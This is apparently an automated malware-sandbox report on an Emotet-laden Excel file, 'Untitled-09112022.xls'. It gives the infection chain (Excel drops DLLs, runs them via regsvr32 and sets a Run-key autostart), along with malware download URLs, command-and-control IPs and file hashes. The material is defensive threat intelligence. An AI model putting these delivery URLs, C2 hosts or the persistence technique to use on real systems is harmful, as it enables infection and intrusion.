Persistence: 11 Registry Run Keys / Startup Folder; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: 111 Process Injection; 11 Registry Run Keys / Startup Folder; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: 141 Masquerading; 1 Modify Registry; 1 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Scripting; 1 Hidden Files and Directories; 2 Obfuscated Files or Information; 1 Regsvr32
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 12 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 35 System Information Discovery; Network Sniffing; Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: 21 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 115 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph ID: 747191 | Sample: Untitled-09112022.xls | Startdate: 16/11/2022 | Architecture: WINDOWS | Score: 100

Node 2 (start):
• 2->37: 103.224.241.74, WEBWERKS-AS-INWebWerksIndiaPvtLtdIN, India
• 2->39: 210.57.209.142, UNAIR-AS-IDUniversitasAirlanggaID, Indonesia
• 2->41: 44 other IPs or domains
• 2->57: Snort IDS alert for network traffic
• 2->59: Multi AV Scanner detection for domain / URL
• 2->61: Antivirus detection for URL or domain
• 2->63: 10 other signatures
• 2->8: EXCEL.EXE 30 24, started
• 2->13: regsvr32.exe, started

Node 8 (EXCEL.EXE):
• 8->43: www.cecambrils.cat
• 8->45: www.hsweixintp.com, 45.207.116.88, 49171, 80, XIAOZHIYUN1-AS-APICIDCNETWORKUS, Seychelles
• 8->47: 5 other IPs or domains
• 8->29: C:\Users\user\elv1.ooocccxxx, PE32+, dropped
• 8->31: C:\Users\user\...\Ji8QgmpX3lS3yT[1].dll, PE32+, dropped
• 8->33: C:\Users\user\Desktop\Untitled-09112022.xls, Composite, dropped
• 8->65: Document exploit detected (creates forbidden files)
• 8->67: Document exploit detected (UrlDownloadToFile)
• 8->15: regsvr32.exe 2, started
• 8->19: regsvr32.exe, started
• 8->21: regsvr32.exe, started
• 8->23: regsvr32.exe, started

Node 13 (regsvr32.exe):
• 13->69: System process connects to network (likely due to code injection or exploit)

Node 15 (regsvr32.exe):
• 15->35: C:\Windows\...\xoEOackyxDExhQ.dll (copy), PE32+, dropped
• 15->55: Hides that the sample has been downloaded from the Internet (zone.identifier)
• 15->25: regsvr32.exe 1, started

Node 25 (regsvr32.exe):
• 25->49: 218.38.121.17, 443, 49179, 49184, SKB-ASSKBroadbandCoLtdKR, Korea Republic of
• 25->51: 115.178.55.22, 49175, 49176, 49180, SIMAYA-AS-IDPTSimayaJejaringMandiriID, Indonesia
• 25->53: 172.105.115.71, 49177, 49178, 49182, LINODE-APLinodeLLCUS, United States
• 25->71: Creates an autostart registry key pointing to binary in C:\Windows



Source | Detection | Scanner | Label
Untitled-09112022.xls | 46% | ReversingLabs | Document-Excel.Trojan.Abracadabra
Untitled-09112022.xls | 61% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll | 69% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll | 0% | Metadefender |
C:\Users\user\elv1.ooocccxxx | 69% | ReversingLabs | Win64.Trojan.Emotet
C:\Users\user\elv1.ooocccxxx | 0% | Metadefender |
C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy) | 69% | ReversingLabs | Win64.Trojan.Emotet
C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy) | 0% | Metadefender |

Source | Detection | Scanner | Label
11.2.regsvr32.exe.2b0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
4.2.regsvr32.exe.4d0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
6.2.regsvr32.exe.160000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

Source | Detection | Scanner | Label
www.hsweixintp.com | 4% | Virustotal |
cecambrils.cat | 8% | Virustotal |
www.stickers-et-deco.com | 12% | Virustotal |
hsweixintp.com | 14% | Virustotal |

Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | 0% | Avira URL Cloud | safe
https://218.38.121.17/kwxkonang/ | 0% | Avira URL Cloud | safe
http://www.cecambrils.cat/wp-content/cXEhHssszV/ | 100% | Avira URL Cloud | malware
http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/ | 100% | Avira URL Cloud | malware
https://115.178.55.22:80/kwxkonang/ | 0% | Avira URL Cloud | safe
http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/ | 100% | Avira URL Cloud | malware
https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | 0% | Avira URL Cloud | safe
https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | 0% | Avira URL Cloud | safe
http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/ | 100% | Avira URL Cloud | malware
https://172.105.115.71:8080/kwxkonang/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hsweixintp.com | 45.207.116.88 | true | false | | unknown
cecambrils.cat | 185.23.117.132 | true | false | | unknown
www.stickers-et-deco.com | 163.172.108.69 | true | false | | unknown
web15f04.uni5.net | 187.1.136.16 | true | false | | high
www.clinicaportalpsicologia.com.br | unknown | unknown | false | | unknown
www.cecambrils.cat | unknown | unknown | true | | unknown
hsweixintp.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/ | false | Avira URL Cloud: malware | unknown
http://www.cecambrils.cat/wp-content/cXEhHssszV/ | true | Avira URL Cloud: malware | unknown
https://218.38.121.17/kwxkonang/ | true | Avira URL Cloud: safe | unknown
https://218.38.121.17/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | true | Avira URL Cloud: safe | unknown
http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/ | false | Avira URL Cloud: malware | unknown
http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/ | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://172.105.115.71:8080/kwxkonang/ | regsvr32.exe, 00000006.00000003.1015548706.0000000000379000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ocsp.entrust.net03 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://115.178.55.22:80/kwxkonang/ | regsvr32.exe, 00000006.00000003.1002662490.0000000000381000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://172.105.115.71:8080/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | regsvr32.exe, 0000000B.00000003.1163475701.0000000000270000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | regsvr32.exe, 00000006.00000002.1193641477.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.1034529943.00000000020D1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1193615497.0000000002114000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://115.178.55.22:80/tfvz/aazuhijovhmgjyf/frsdlxdmvshfvd/ | regsvr32.exe, 0000000B.00000003.1150324980.0000000000271000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.105.115.71 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | true
187.1.136.16 | web15f04.uni5.net | Brazil | 28299 | IPV6InternetLtdaBR | false
188.165.79.151 | unknown | France | 16276 | OVHFR | true
196.44.98.190 | unknown | Ghana | 327814 | EcobandGH | true
174.138.33.49 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
36.67.23.59 | unknown | Indonesia | 17974 | TELKOMNET-AS2-APPTTelekomunikasiIndonesiaID | true
103.41.204.169 | unknown | Indonesia | 58397 | INFINYS-AS-IDPTInfinysSystemIndonesiaID | true
85.214.67.203 | unknown | Germany | 6724 | STRATOSTRATOAGDE | true
83.229.80.93 | unknown | United Kingdom | 8513 | SKYVISIONGB | true
198.199.70.22 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
93.104.209.107 | unknown | Germany | 8767 | MNET-ASGermanyDE | true
186.250.48.5 | unknown | Brazil | 262807 | RedfoxTelecomunicacoesLtdaBR | true
209.239.112.82 | unknown | United States | 30083 | AS-30083-GO-DADDY-COM-LLCUS | true
175.126.176.79 | unknown | Korea Republic of | 9523 | MOKWON-AS-KRMokwonUniversityKR | true
128.199.242.164 | unknown | United Kingdom | 14061 | DIGITALOCEAN-ASNUS | true
178.238.225.252 | unknown | Germany | 51167 | CONTABODE | true
46.101.98.60 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
190.145.8.4 | unknown | Colombia | 14080 | TelmexColombiaSACO | true
82.98.180.154 | unknown | Spain | 42612 | DINAHOSTING-ASES | true
103.71.99.57 | unknown | India | 135682 | AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdIN | true
87.106.97.83 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
103.254.12.236 | unknown | Viet Nam | 56151 | DIGISTAR-VNDigiStarCompanyLimitedVN | true
103.85.95.4 | unknown | Indonesia | 136077 | IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramID | true
202.134.4.210 | unknown | Indonesia | 7713 | TELKOMNET-AS-APPTTelekomunikasiIndonesiaID | true
165.22.254.236 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
78.47.204.80 | unknown | Germany | 24940 | HETZNER-ASDE | true
118.98.72.86 | unknown | Indonesia | 7713 | TELKOMNET-AS-APPTTelekomunikasiIndonesiaID | true
139.59.80.108 | unknown | Singapore | 14061 | DIGITALOCEAN-ASNUS | true
104.244.79.94 | unknown | United States | 53667 | PONYNETUS | true
37.44.244.177 | unknown | Germany | 47583 | AS-HOSTINGERLT | true
51.75.33.122 | unknown | France | 16276 | OVHFR | true
160.16.143.191 | unknown | Japan | 9370 | SAKURA-BSAKURAInternetIncJP | true
103.56.149.105 | unknown | Indonesia | 55688 | BEON-AS-IDPTBeonIntermediaID | true
85.25.120.45 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | true
139.196.72.155 | unknown | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
115.178.55.22 | unknown | Indonesia | 38783 | SIMAYA-AS-IDPTSimayaJejaringMandiriID | true
103.126.216.86 | unknown | Bangladesh | 138482 | SKYVIEW-AS-APSKYVIEWONLINELTDBD | true
128.199.217.206 | unknown | United Kingdom | 14061 | DIGITALOCEAN-ASNUS | true
114.79.130.68 | unknown | India | 45769 | DVOIS-IND-VoisBroadbandPvtLtdIN | true
45.207.116.88 | www.hsweixintp.com | Seychelles | 136800 | XIAOZHIYUN1-AS-APICIDCNETWORKUS | false
103.224.241.74 | unknown | India | 133296 | WEBWERKS-AS-INWebWerksIndiaPvtLtdIN | true
210.57.209.142 | unknown | Indonesia | 38142 | UNAIR-AS-IDUniversitasAirlanggaID | true
202.28.34.99 | unknown | Thailand | 9562 | MSU-TH-APMahasarakhamUniversityTH | true
80.211.107.116 | unknown | Italy | 31034 | ARUBA-ASNIT | true
54.37.228.122 | unknown | France | 16276 | OVHFR | true
163.172.108.69 | www.stickers-et-deco.com | United Kingdom | 12876 | OnlineSASFR | false
218.38.121.17 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
185.148.169.10 | unknown | Germany | 44780 | EVERSCALE-ASDE | true
185.23.117.132 | cecambrils.cat | United Kingdom | 31708 | COREIX-UK-ASLondonGreatBritainGB | false
195.77.239.39 | unknown | Spain | 60493 | FICOSA-ASES | true
178.62.112.199 | unknown | European Union | 14061 | DIGITALOCEAN-ASNUS | true
62.171.178.147 | unknown | United Kingdom | 51167 | CONTABODE | true
64.227.55.231 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:747191
                                    Start date and time:2022-11-16 05:42:19 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 6m 28s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Untitled-09112022.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@12/10@5/53
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 82.5% (good quality ratio 75.3%)
                                    • Quality average: 72.8%
                                    • Quality standard deviation: 32.3%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xls
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:43:24 | API Interceptor | 4x Sleep call for process: regsvr32.exe modified
05:44:26 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                                    No context
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                     • Antivirus: Metadefender, Detection: 0%
                                    Reputation:low
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):3.356162402539466
                                    Encrypted:false
                                    SSDEEP:768:Am9gKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgACK:8Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgA
                                    MD5:246B1D2A8183FD0BD63916CA9EBB737C
                                    SHA1:5A6923EC5F27A1847EEA388FB0ED4823A0DA7843
                                    SHA-256:54DDBC22097FFF8FA45A72B6722860AC04F85C71C0224D6B9134F3134F8E1B5A
                                    SHA-512:1FA2AE0CAEFF3C5557A8998B7EC02B3C0C20054ABE2B09D6B4879FC6B2641F3AADA9D407D3EFC1E331A1FCCE5F4D682299517035CF5AFD050A9E47A7FE3A5C6C
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):359
                                    Entropy (8bit):5.647674630438457
                                    Encrypted:false
                                    SSDEEP:6:7QXmFAh0Q0JRcVMTnpVY+6SiJS6DqVoJj51Udcvoufcv0wHOsSX1xFIIEF67X:mgY0QUnpP6SiFDqVWSQoTHMXRk67X
                                    MD5:A9CADDD42C45A20DA2609B237C5B6523
                                    SHA1:9F1EE10C7EE6E055EEF5CEAAD76586450F9AF81A
                                    SHA-256:3A447E4CB340C6FBD9A3A453B139452682AC34FB5F396423C18806FDFB7D58D7
                                    SHA-512:06AC22B5ECB24D93E6FC9BDD3BA3D82BFD9FAC25CC3A2D9A939DCA7D550DD26316425999558F3AC8D2E2EF7BCB312180207EA52950F5E1F3865C5211DD7C5AFB
                                    Malicious:false
                                    Preview:PrestaShop-76bfdce226b740dc1298019a18e61155.454f5619c2242a2b3d522efeae2f6c48a578aba8c10278d9f2d8899a3fcad222%3A7VXP1JRg6sMvuxPANoFERLi7pCnrxsYqh8BZef4CZlrnQztM92Sg9jLq7GIDevQzzQ9P0reTobhVinLo3QJBWkBFdKI37ltxfwgwuTELet01SKQ4bMLcAdkfSwCEuWEVYtW0yeVouVHIO8jPqvQEHfrz8a8OziW2SVas17jQLdQ%3D.www.stickers-et-deco.com/.9216.1117681408.31000877.1714585437.30996929.*.
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):93696
                                    Entropy (8bit):5.495625974977679
                                    Encrypted:false
                                    SSDEEP:1536:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsx:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgr
                                    MD5:F9382AF6D575DD2A072229C7A25FD170
                                    SHA1:42275E405131460B1B76D3EE8CACC16A66039F76
                                    SHA-256:998EA53B19DD586D91608E76F17B0A92ABE3033E52D146EE3495EC260DB59DC1
                                    SHA-512:DDCBA8C57BC2E79E3671C0D8D9FF62BC308C010055362F879A1CA0A0E0B7E327F5E16F0E7DE682AD487C638D38A4C946E87F1C639A1D053B4A582856AA3B4AA6
                                    Malicious:false
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Gydar, Last Saved By: user, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Nov 16 13:43:55 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):94208
                                    Entropy (8bit):5.48045160479881
                                    Encrypted:false
                                    SSDEEP:1536:bVk3hOdsylKlgxopeiBNhZFGzE+cL2kdAvbCXuZH4gb4CEn9J4ZSRkP6Cx4:5k3hOdsylKlgxopeiBNhZFGzE+cL2kdz
                                    MD5:7B471565086AF4FC47970C5EC04076BB
                                    SHA1:4A302700FD9F485E5B3B4F38C8047CEA9FD66CB1
                                    SHA-256:FDCD4B4EA6350C416F1B3FE6B352B5185D1CCCFFC4608A06AF2538C40F03097F
                                    SHA-512:2EF71C68C770BEB91E9BF5AB1A33D0476F0547FE45D5C1CB5CE16DF6FCA978F1EF1CE83640153A91B70F73360787ECEE4DEA6C9243A63A0F380F61ED30E77A30
                                    Malicious:false
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\4DF60000, Author: John Lambert @JohnLaTwC
                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\4DF60000, Author: Joe Security
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):93696
                                    Entropy (8bit):5.495625974977679
                                    Encrypted:false
                                    SSDEEP:1536:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsx:6Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgr
                                    MD5:F9382AF6D575DD2A072229C7A25FD170
                                    SHA1:42275E405131460B1B76D3EE8CACC16A66039F76
                                    SHA-256:998EA53B19DD586D91608E76F17B0A92ABE3033E52D146EE3495EC260DB59DC1
                                    SHA-512:DDCBA8C57BC2E79E3671C0D8D9FF62BC308C010055362F879A1CA0A0E0B7E327F5E16F0E7DE682AD487C638D38A4C946E87F1C639A1D053B4A582856AA3B4AA6
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\Untitled-09112022.xls, Author: John Lambert @JohnLaTwC
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                     • Antivirus: Metadefender, Detection: 0%
                                    Process:C:\Windows\System32\regsvr32.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):636416
                                    Entropy (8bit):6.825556208271753
                                    Encrypted:false
                                    SSDEEP:6144:S6/ptuaN+qWUILr1HRf/9Mu1vHLI7U9XWiHgQ30/bP/09Xls9HV6MExbnyDAzlsH:S6/ptu/qerXtU7U9XGZWYobyDAzl+
                                    MD5:95E74674029DA73F1CDC0FFFFF65F490
                                    SHA1:3007175D3FEFDA0C274DB227A0E1F0954C577947
